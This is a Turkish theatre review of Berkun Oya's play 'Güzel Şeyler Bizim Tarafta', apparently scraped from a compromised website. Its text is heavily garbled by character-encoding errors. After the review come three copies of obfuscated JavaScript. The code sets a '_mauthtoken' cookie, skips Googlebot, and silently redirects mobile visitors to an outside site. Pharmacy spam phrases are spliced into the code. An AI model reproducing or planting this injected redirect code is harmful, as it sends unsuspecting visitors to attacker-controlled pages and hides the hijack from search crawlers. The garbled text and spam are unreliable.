GA?zel Azeyler Bizim Tarafta ciddi bir oyun. Evine hAi??rsAi??z girdiAYinde ilk olarak plaklarAi??nAi?? kontrol eden ama bir pikaba bile sahip olmayan bir adam, aynAi?? zevklere sahip olmadAi??AYAi?? adamAi?? aradan yAi??llar geAi??tikten sonra tanAi??yan ve terk ediAYi bir fotoAYraf makinesinin ederiyle ucuzlaAYtAi??ran bir kadAi??n kadar ciddi. UzaklaAYmaya gerek yok; Ai??teki sokakta, arkadaki apartmanda, Ai??bA?r odada, yanAi?? baAYAi??mAi??zda alevlenen bir aAYk var ve onun AYiddetle kol gezen hovardalAi??AYAi?? yanAi??nda sevmenin de seviAYmenin de tarifiAi??zor. Bir ai???kAi??ylA? kAi??zAi??ai??? stereotipiyle sahneye konuk olan AyAYeai??i??nin aAYk tasavvurunun AYehirli bir zA?ppeninAi??ai???Hamile misin?ai??? sorusuyla aAYaAYAi??lamaya dAi??nA?AYmesi kadar da basit aslAi??nda.

Ai??ok da karmaAYAi??k olmayan bir olaylar dizgesinin, uAi??arAi??lAi??klara kaAi??madan, marjinal olmaya Ai??alAi??AYmadan, spotlara boAYulmadan, dekorlara boyanmadan ve kendini aAYAi??rdan satmadan bAi??ylesi gA?Ai??lA? etkiye dAi??nA?AYmesi az rastlanan bir durum. Berkun Oyaai??i??nAi??n tesadA?fler ve kaderle olan savaAYAi??ndan ardaAi??kalanlarAi?? izlediAYimiz GA?zel Azeyler Bizim Tarafta, kendine has yapAi??sAi??yla, tiyatronun ne olduAYuna dairAi??hA?lA? derin kuAYkular taAYAi??yan yazarAi??yla ve oyuncularAi??nAi??n alkAi??AYlanmaktan A?rken tavAi??rlarAi??yla antitiyatronun kallavi bir Ai??rneAYini oluAYturuyor. AKMai??i??nin Ai??nA?nden tiyatronun Ai??nA?ne kadar giden A?cretsiz servisler, sizi tarafAi??nAi??zAi?? seAi??meye Ai??aAYAi??rAi??yorai??i??

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Brand Viagra no rx, order zithromax. Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| order Kamagra Soft online cheap, online Zoloft. |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ Eriacta buy online, purchase dapoxetine. _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hakkında Turgay Yıldıran

Yoruma kapalı.